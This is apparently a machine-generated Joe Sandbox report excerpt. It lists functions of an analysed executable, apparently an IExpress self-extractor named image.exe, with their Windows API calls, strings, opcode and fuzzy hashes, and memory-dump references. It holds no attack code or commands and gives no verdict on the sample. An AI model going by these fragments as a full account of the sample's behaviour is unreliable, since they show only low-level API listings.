API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
String ID:
API String ID: 975904313-0
Opcode ID: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
Instruction ID: 811eedc0f2d70a97fb068f670df16fa706b3fb7acdb2c6506488f4e9d30b5baf
Opcode Fuzzy Hash: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
Instruction Fuzzy Hash: 5B51C563A186C545FB214F21A4043FD6B91AB4EBBCF488171CA8E477A5CE3ED487874B

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB144C68 Relevance: 10.6, APIs: 7, Instructions: 100COMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 00007FF6EB144C9B
GetWindowRect.USER32 ref: 00007FF6EB144CBC
GetDC.USER32 ref: 00007FF6EB144CD9
GetDeviceCaps.GDI32 ref: 00007FF6EB144CF0
GetDeviceCaps.GDI32 ref: 00007FF6EB144D07
ReleaseDC.USER32 ref: 00007FF6EB144D20
SetWindowPos.USER32 ref: 00007FF6EB144D92

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: Window$CapsDeviceRect$Release
String ID:
API String ID: 2212493051-0
Opcode ID: f008325a7646b8fc205624c4fd77acf99a3c7384c25ca23c8312c3aeeac09b65
Instruction ID: 8255ec9b94f09357282656ca69511bb7ec173dea70314f40b78ec34db8581e58
Opcode Fuzzy Hash: f008325a7646b8fc205624c4fd77acf99a3c7384c25ca23c8312c3aeeac09b65
Instruction Fuzzy Hash: 3B315B37B146418EE7108B65E904AED7BA1F74DBADF585130CE0A93B68CF3EA4468B04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB14772C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6EB14114C: _vsnprintf.MSVCRT ref: 00007FF6EB141189

LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6EB14606F), ref: 00007FF6EB147763
LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6EB14606F), ref: 00007FF6EB147772
FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6EB14606F), ref: 00007FF6EB1477B8
FindResourceA.KERNEL32 ref: 00007FF6EB1477EC
FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6EB14606F), ref: 00007FF6EB147805

Strings

UPDFILE%lu, xrefs: 00007FF6EB1477C9

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: Resource$Free$FindLoadLock_vsnprintf
String ID: UPDFILE%lu
API String ID: 2922116661-2329316264
Opcode ID: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
Instruction ID: fa4c3a052edb66a61a6380b82ee1ca1a3c99d7de3980cfd764a650273f1f2404
Opcode Fuzzy Hash: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
Instruction Fuzzy Hash: ED317333A08742C6E7108B25A4002F9BBA1FB8DBACF558635DA5E877A4CF3DE406C705

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB142244 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32 ref: 00007FF6EB142271
WritePrivateProfileStringA.KERNEL32 ref: 00007FF6EB1422A0
_lopen.KERNEL32 ref: 00007FF6EB1422B4
_llseek.KERNEL32 ref: 00007FF6EB1422CF
_lclose.KERNEL32 ref: 00007FF6EB1422DF

Strings

wininit.ini, xrefs: 00007FF6EB142281

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
String ID: wininit.ini
API String ID: 3273605193-4206010578
Opcode ID: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
Instruction ID: ca8d01c8c320c53c4feb242e24a3e50be122f01ab7131d58bc194573a6a2bd22
Opcode Fuzzy Hash: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
Instruction Fuzzy Hash: 30113D33604A818BE7209B21E8543E9B7A1FBCD76DF858231DA4E83664DE3DD54ACA05

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB143840 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00007FF6EB14388E
SetWindowTextA.USER32 ref: 00007FF6EB1438AF
SetDlgItemTextA.USER32 ref: 00007FF6EB1438CA
SetForegroundWindow.USER32 ref: 00007FF6EB1438D9
EndDialog.USER32 ref: 00007FF6EB1438EC

Strings

probe, xrefs: 00007FF6EB1438A5

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: Window$Text$DesktopDialogForegroundItem
String ID: probe
API String ID: 761066910-3613290282
Opcode ID: 53f545d9e0ff8d341fef1ad6af6e18a944f324add3d94d70d3143487fc889582
Instruction ID: 545dd46c5558d0c2c0f93b3fe520e9a9367b9793a0d39b2103b2d850f91c5dbc
Opcode Fuzzy Hash: 53f545d9e0ff8d341fef1ad6af6e18a944f324add3d94d70d3143487fc889582
Instruction Fuzzy Hash: 1C118A72E087438AF7641B55B5083F8A651EB4FB6DF649231C90E863B4CF3EA446C606

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB14494C Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6EB145050: FindResourceA.KERNEL32 ref: 00007FF6EB145078
Part of subcall function 00007FF6EB145050: SizeofResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB145089
Part of subcall function 00007FF6EB145050: FindResourceA.KERNEL32 ref: 00007FF6EB1450AF
Part of subcall function 00007FF6EB145050: LoadResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB1450C0
Part of subcall function 00007FF6EB145050: LockResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB1450CF
Part of subcall function 00007FF6EB145050: memcpy_s.MSVCRT ref: 00007FF6EB1450EE
Part of subcall function 00007FF6EB145050: FreeResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB1450FD

LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF6EB143388), ref: 00007FF6EB144975
LocalFree.KERNEL32(?,?,?,?,00000000,00007FF6EB143388), ref: 00007FF6EB144A11

Part of subcall function 00007FF6EB144DCC: LoadStringA.USER32 ref: 00007FF6EB144E60
Part of subcall function 00007FF6EB144DCC: MessageBoxA.USER32 ref: 00007FF6EB144EA0

Strings

FINISHMSG, xrefs: 00007FF6EB144959, 00007FF6EB1449AC
@, xrefs: 00007FF6EB1449F7
<None>, xrefs: 00007FF6EB1449D5

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
String ID: <None>$@$FINISHMSG
API String ID: 3507850446-4126004490
Opcode ID: 760d25304cf72e37016d0e62cc70db3c29a3ec5d2e35ee233f7aec18b113d241
Instruction ID: 303f11de0d345c3e6b95f5619730fb39060221c1ddf6a83f043a3fe61e52fe8b
Opcode Fuzzy Hash: 760d25304cf72e37016d0e62cc70db3c29a3ec5d2e35ee233f7aec18b113d241
Instruction Fuzzy Hash: 7B11A473A0824287F7209B20E4517FA7691EB8D7ACF549134DA4E826B4DF3ED1068B09

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB1479F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48libraryCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 00007FF6EB147A68
LoadLibraryExA.KERNEL32 ref: 00007FF6EB147A88
LoadLibraryA.KERNEL32 ref: 00007FF6EB147A9D

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF6EB147A0E
advpack.dll, xrefs: 00007FF6EB147A4B, 00007FF6EB147A96

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: LibraryLoad$AttributesFile
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
API String ID: 438848745-258089097
Opcode ID: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
Instruction ID: e0e873c544c083cc310ff9f97cfe75f475def0d0deb76f6821c41600b6a3fa9c
Opcode Fuzzy Hash: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
Instruction Fuzzy Hash: 12119333A1868286EE219B10E4403F977A0FB8D72CF980231C68D826B1CF3ED60BC705

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB141500 Relevance: 7.6, APIs: 5, Instructions: 50windowCOMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF6EB141545
GetDesktopWindow.USER32 ref: 00007FF6EB141557
LoadStringA.USER32 ref: 00007FF6EB141587
SetDlgItemTextA.USER32 ref: 00007FF6EB1415A0
MessageBeep.USER32 ref: 00007FF6EB1415AF

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
String ID:
API String ID: 1273765764-0
Opcode ID: 959f28d1b95b8526aa68c42a3a998ab188e5ed3d10e9a2e05c875aba66557268
Instruction ID: e33b9deae08f66caea28b0a334c6982b2485618b0c6d5a636ef198ccd188f947
Opcode Fuzzy Hash: 959f28d1b95b8526aa68c42a3a998ab188e5ed3d10e9a2e05c875aba66557268
Instruction Fuzzy Hash: 31117572A08A8586EA605B54B4083F96B60FB8FBBCF544231C95E8B3E5CF3DD0468745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB143BF4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 236windowCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF6EB143C3F
MessageBeep.USER32 ref: 00007FF6EB143EB9

Part of subcall function 00007FF6EB147F04: GetVersionExA.KERNEL32 ref: 00007FF6EB147F59
Part of subcall function 00007FF6EB147F04: GetSystemMetrics.USER32 ref: 00007FF6EB147F93
Part of subcall function 00007FF6EB147F04: RegOpenKeyExA.ADVAPI32 ref: 00007FF6EB147FC8
Part of subcall function 00007FF6EB147F04: RegQueryValueExA.ADVAPI32 ref: 00007FF6EB148003
Part of subcall function 00007FF6EB147F04: RegCloseKey.ADVAPI32 ref: 00007FF6EB148016
Part of subcall function 00007FF6EB147F04: CharNextA.USER32 ref: 00007FF6EB148065

MessageBoxA.USER32 ref: 00007FF6EB143EF3

Part of subcall function 00007FF6EB147E34: EnumResourceLanguagesA.KERNEL32 ref: 00007FF6EB147E8C
Part of subcall function 00007FF6EB147E34: EnumResourceLanguagesA.KERNEL32 ref: 00007FF6EB147ECA

Strings

probe, xrefs: 00007FF6EB143EE4, 00007FF6EB143F24

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: EnumLanguagesMessageResourceVersion$BeepCharCloseMetricsNextOpenQuerySystemValue
String ID: probe
API String ID: 2312377310-3613290282
Opcode ID: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
Instruction ID: 5de8e43354eb82fe322b4fcdc79e6a2adb573d6412cfebc1c953c83187bf94d5
Opcode Fuzzy Hash: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
Instruction Fuzzy Hash: 62A17033A1924286FB608B15A6447FA66A4FF4D77CF550136E90DD32A4CE3FE847870A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB1478B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00007FF6EB14795B
WriteFile.KERNEL32 ref: 00007FF6EB147992
CloseHandle.KERNEL32 ref: 00007FF6EB1479B7

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF6EB1478E2

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 1065093856-2312194364
Opcode ID: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
Instruction ID: 736f5b089757a599b2b3e738989ec8f2d3687034ba6e97195d3a55e6512c4908
Opcode Fuzzy Hash: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
Instruction Fuzzy Hash: CC315D7361868186EB218F10E4407EAA760FB897ACF444235DB9D876A4CF7DD90ACB05

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB148470 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6EB1484E3
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6EB148502
RtlVirtualUnwind.KERNEL32 ref: 00007FF6EB14854F
__raise_securityfailure.LIBCMT ref: 00007FF6EB148634

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
String ID:
API String ID: 140117192-0
Opcode ID: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
Instruction ID: f8e7df7ce06100d68e093f7c6f09a478947882f5687cb3911f72fd6f8b0b9c5b
Opcode Fuzzy Hash: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
Instruction Fuzzy Hash: B341B47AA09B0285EA108B58F8903A573A4FB8C7ACF504136DA8DC3774DF7EE546C706

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB147AC8 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32 ref: 00007FF6EB147AF2
LoadResource.KERNEL32 ref: 00007FF6EB147B09
DialogBoxIndirectParamA.USER32 ref: 00007FF6EB147B3F
FreeResource.KERNEL32 ref: 00007FF6EB147B51

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: Resource$DialogFindFreeIndirectLoadParam
String ID:
API String ID: 1214682469-0
Opcode ID: 13cac0b9ca72075f5d7f1d00aa19e0549b75852ecd71447385bebf4ad58ecc71
Instruction ID: 6640a203fe2d43dcee3293dbca9b5e672e2b5b79a8c0f8e16ad987b83f8febfc
Opcode Fuzzy Hash: 13cac0b9ca72075f5d7f1d00aa19e0549b75852ecd71447385bebf4ad58ecc71
Instruction Fuzzy Hash: 38114F32A08B4186EA108B11E4442A9BA60FB8DFF8F484634DF5D47BA4DF7DD4428A08

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB147C40 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

CharPrevA.USER32(?,?,00000000,00007FF6EB142B25), ref: 00007FF6EB147C64
CharPrevA.USER32(?,?,00000000,00007FF6EB142B25), ref: 00007FF6EB147C80
CharPrevA.USER32(?,?,00000000,00007FF6EB142B25), ref: 00007FF6EB147CA4
CharNextA.USER32(?,?,00000000,00007FF6EB142B25), ref: 00007FF6EB147CB8

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: Char$Prev$Next
String ID:
API String ID: 3260447230-0
Opcode ID: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
Instruction ID: 4e86d6d64b37be94c238934ebb9a1e64975bbc976bf4bd2c0f2f976a47052f40
Opcode Fuzzy Hash: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
Instruction Fuzzy Hash: DE119473A0868285EB210B11A5043BAAA91E74EFFCF498271DB5A46794CE2D94428706

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB148648 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6EB148653
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6EB148672
RtlVirtualUnwind.KERNEL32 ref: 00007FF6EB1486BF
__raise_securityfailure.LIBCMT ref: 00007FF6EB148735

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
String ID:
API String ID: 140117192-0
Opcode ID: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
Instruction ID: 583e5a25f0a259762303d358f800ce4ac67407736504bc8076ce46a9e61ef655
Opcode Fuzzy Hash: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
Instruction Fuzzy Hash: 6F21E736A0CB4285E7108B48F8803A573A4FB887ACF500036DA8D83774DF7ED146C70A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB143B40 Relevance: 6.0, APIs: 4, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32 ref: 00007FF6EB143B64
PeekMessageA.USER32 ref: 00007FF6EB143B89
DispatchMessageA.USER32 ref: 00007FF6EB143BAC
PeekMessageA.USER32 ref: 00007FF6EB143BCD

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsWait
String ID:
API String ID: 2776232527-0
Opcode ID: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
Instruction ID: effc304175dd2daaf2edac3fef899dc26e7a24e0a29417b5ff5db0a054556386
Opcode Fuzzy Hash: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
Instruction Fuzzy Hash: 0D11A733A1864287E7B08F20F544BBABA90FB9D76DF449131DA4A82990DF7DD04ACF05

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: image.exePID: 7008, Parent PID: 4520COMMON

Execution Graph

Execution Coverage:	10.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	124
Total number of Limit Nodes:	4

Executed Functions

Function 052A0E2C Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 052A0F4A

Memory Dump Source

Source File: 00000002.00000002.308026235.00000000052A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_52a0000_image.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 7d6743ef1e3c9ede1f7df23abe343e9cfcd09efca45c9a6e769f99f7b7307bf9
Instruction ID: 86aa6949a2e9e68f6edb0412942543365ea1782f020b76031965b89afeac13c7
Opcode Fuzzy Hash: 7d6743ef1e3c9ede1f7df23abe343e9cfcd09efca45c9a6e769f99f7b7307bf9
Instruction Fuzzy Hash: 0251B0B1D10309DFDB14CF99D884ADEBBF5BF88314F24862AE819AB210D7749985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 052A0E38 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 052A0F4A

Memory Dump Source

Source File: 00000002.00000002.308026235.00000000052A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_52a0000_image.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: d5886daabf22fb4e6766cbf27123fce197ab6f6cb89b88896ec72509666af52f
Instruction ID: 995d05dd2d9b88b0a25832c709c70ee9761f0dc9c8b4d129d22e72b31d458c09
Opcode Fuzzy Hash: d5886daabf22fb4e6766cbf27123fce197ab6f6cb89b88896ec72509666af52f
Instruction Fuzzy Hash: E8419FB1D103099FDB14CF9AD984ADEBBF5BF88314F24862AE819AB210D7749945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02B63E08 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02B65421

Memory Dump Source

Source File: 00000002.00000002.305738250.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2b60000_image.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: bbfc90352def183ffa9f49077a782982a2ab07f928dd0f74b4db2818a7ec2dd3
Instruction ID: b7e70347232e939021628cd4fc1d1f76012196ece3f0e6eb6daed0a466b6ce84
Opcode Fuzzy Hash: bbfc90352def183ffa9f49077a782982a2ab07f928dd0f74b4db2818a7ec2dd3
Instruction Fuzzy Hash: FC41F171C00218CBDB24CFA9C888BDEBBF5BF48308F5484A9D409BB255DBB56949CF90

Uniqueness

Uniqueness Score: -1.00%

